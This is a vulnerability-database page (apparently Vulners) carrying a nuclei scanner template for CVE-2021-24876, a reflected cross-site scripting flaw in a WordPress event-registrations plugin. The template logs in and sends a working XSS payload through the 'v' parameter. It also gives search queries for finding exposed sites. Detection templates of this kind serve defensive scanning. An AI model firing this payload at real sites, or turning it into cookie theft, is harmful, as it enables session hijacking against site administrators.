Lucene search
K

Registrations for The Events Calendar < 2.7.5 - Authenticated Reflected Cross-Site Scripting

šŸ—“ļøĀ 06 Jul 2026Ā 03:02:03Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 11Ā Views

Authenticated reflected cross-site scripting in Registrations for The Events Calendar before 2.7.5; fixed in 2.7.5.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24876
29 Nov 202112:33
–circl
CNNVD
WordPress ę’ä»¶č·Øē«™č„šęœ¬ę¼ę“ž
29 Nov 202100:00
–cnnvd
CVE
CVE-2021-24876
29 Nov 202108:25
–cve
Cvelist
CVE-2021-24876 Registrations for The Events Calendar < 2.7.5 - Reflected Cross-Site Scripting
29 Nov 202108:25
–cvelist
EUVD
EUVD-2021-11788
7 Oct 202500:30
–euvd
NVD
CVE-2021-24876
29 Nov 202109:15
–nvd
OSV
CVE-2021-24876
29 Nov 202109:15
–osv
Patchstack
WordPress Registrations for the Events Calendar plugin <= 2.7.4 - Reflected Cross-Site Scripting (XSS) vulnerability
27 Oct 202100:00
–patchstack
Prion
Cross site scripting
29 Nov 202109:15
–prion
Positive Technologies
PT-2021-16349
29 Nov 202100:00
–ptsecurity
Rows per page
id: CVE-2021-24876

info:
  name: Registrations for The Events Calendar < 2.7.5 - Authenticated Reflected Cross-Site Scripting
  author: popcorn94
  severity: medium
  description: |
    The Registrations for the Events Calendar WordPress plugin before 2.7.5 does not escape the v parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting
  impact: |
    Attackers can inject malicious JavaScript via reflected XSS, potentially stealing administrator session cookies or performing administrative actions on behalf of authenticated users.
  remediation: Fixed in 2.7.5
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24876
    - https://wpscan.com/vulnerability/e77c2493-993d-418d-9629-a1f07b5a2b6f/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24876
    cwe-id: CWE-79
    epss-score: 0.01165
    epss-percentile: 0.63477
    cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: roundupwp
    product: registrations_for_the_events_calendar
    framework: wordpress
    fofa-query: body="/wp-content/plugins/registrations-for-the-events-calendar/"
    publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/"
  tags: cve,cve2021,wordpress,wpscan,wp-plugin,wp,registrations-for-the-events-calendar,xss,authenticated,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=registrations-for-the-events-calendar&tab=registrations&v="+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"style=animation-name:rotation onanimationstart=alert(document.domain)//", "<input type=\"hidden\" name=\"v\"","registrations-for-the-events-calendar")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022060dc835645533f73da9ea77e2c28c303f9786273bd40ebbd18044ca1d500811d022100d2c4364fa8874524bcec3f45e7c318d0dfbf46085d36c0ef8637682885a57ab6:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.01165
11